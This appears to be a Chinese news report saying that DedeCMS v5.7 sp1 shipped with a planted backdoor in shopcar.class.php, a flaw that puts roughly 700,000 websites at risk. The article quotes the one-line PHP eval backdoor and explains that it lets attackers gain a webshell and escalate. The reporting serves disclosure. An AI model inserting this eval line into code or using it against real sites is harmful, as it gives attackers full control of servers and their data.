传织梦CMS系统被植入后门 网站控制权恐遭窃取 

  据悉,织梦CMS(Dedecms)v5.7 sp1版本的中的shopcar。class。php文件被植入一句后门代码 “@eval(file_get_contents(‘php://input’));”。通过利用该后门,黑客只需构造简单的数据包提交到服务器,就能 获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限。

DoNews 3月22日消息 据消息人士对DoNews透露,PHP开源网站管理系统织梦CMS(DedeCms)v5.7 sp1版本被植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。

据悉,织梦CMS(Dedecms)v5.7 sp1版本的中的shopcar。class。php文件被植入一句后门代码 “@eval(file_get_contents(‘php://input’));”。通过利用该后门,黑客只需构造简单的数据包提交到服务器,就能 获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限。

织梦CMS漏洞示意图

  另据CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。(完)

订阅评论
提醒
guest的头像

0 评论
内联反馈
查看所有评论
0
希望看到您的想法,请您发表评论x